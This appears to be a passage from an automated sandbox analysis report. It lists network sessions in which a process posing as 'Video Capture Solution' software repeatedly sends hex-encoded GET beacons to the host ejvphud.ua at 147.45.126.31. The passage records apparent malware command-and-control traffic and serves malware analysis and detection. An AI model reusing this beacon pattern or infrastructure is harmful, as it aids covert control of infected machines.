                                                        Data Ascii: 25e67b69c953804b26b565fe95b321bd19a55ff8fcff51e18e9bd55ea04caf882ee9e864d804cd8e4da3629a64ffccac61822f7765aa87ff767a9335ec9fbcd0ac65dcc79b50efd37832ce510a666ce54b3fd4fe95b6141ee2679963b6d8dff11c0e4949d33d3699508dc51912bb05eb9e85f21ed70daff67bb8fedcb4be03fd71731585024e325720360b1f28ffd833355e0427a25f42f5df7f7e68af8207ea1f3469184e5782716b76bef98cbb964d1681b293861b256cedfb33b2cb0c80eb800b2ab31a6c4c3336a230acd37e219efd1be0744d33616da57c5fb668324be9c5fa2e2d0a3c93f3dbf7db5f3089fa6a2725da88df121adf5868701ef15e64481496bd1b7c3fbd24967a199e53ba771970e33aa3cd23bc3960ac85db5310f1453d4d66f5b25506080e28f2226654f10ff0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.449755147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:07.026691914 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:08.409395933 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.449757147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:08.649835110 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:10.043884039 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20
                                                        Dec 16, 2024 14:53:10.154171944 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:10.695456982 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.449765147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:10.930886030 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:12.337655067 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.449768147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:12.572458029 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:13.939490080 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.449774147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:14.181159019 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:15.551892996 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.449778147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:15.790868044 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:17.135580063 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.449781147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:17.468280077 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:18.859541893 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20
                                                        Dec 16, 2024 14:53:18.966852903 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:19.478001118 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.449789147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:19.712526083 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:21.246119022 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20
                                                        Dec 16, 2024 14:53:21.357280970 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:21.856231928 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20
                                                        Dec 16, 2024 14:53:21.966519117 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:22.496283054 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20
                                                        Dec 16, 2024 14:53:22.614489079 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:23.106645107 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.449798147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:23.446971893 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:25.812499046 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.449803147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:26.322401047 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:27.712352991 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20
                                                        Dec 16, 2024 14:53:27.826060057 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:28.326920033 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.449811147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:28.688622952 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:29.959032059 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.449815147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:30.225482941 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:31.620377064 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.449821147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:31.975008965 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:33.370970964 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20
                                                        Dec 16, 2024 14:53:33.482516050 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:34.117160082 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.449827147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:34.408777952 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:35.744419098 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.449833147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:35.977987051 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:37.333621025 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.449837147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:37.608743906 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:38.973234892 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.449840147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:39.212215900 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:40.596025944 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.449846147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:40.838383913 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:42.202605009 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
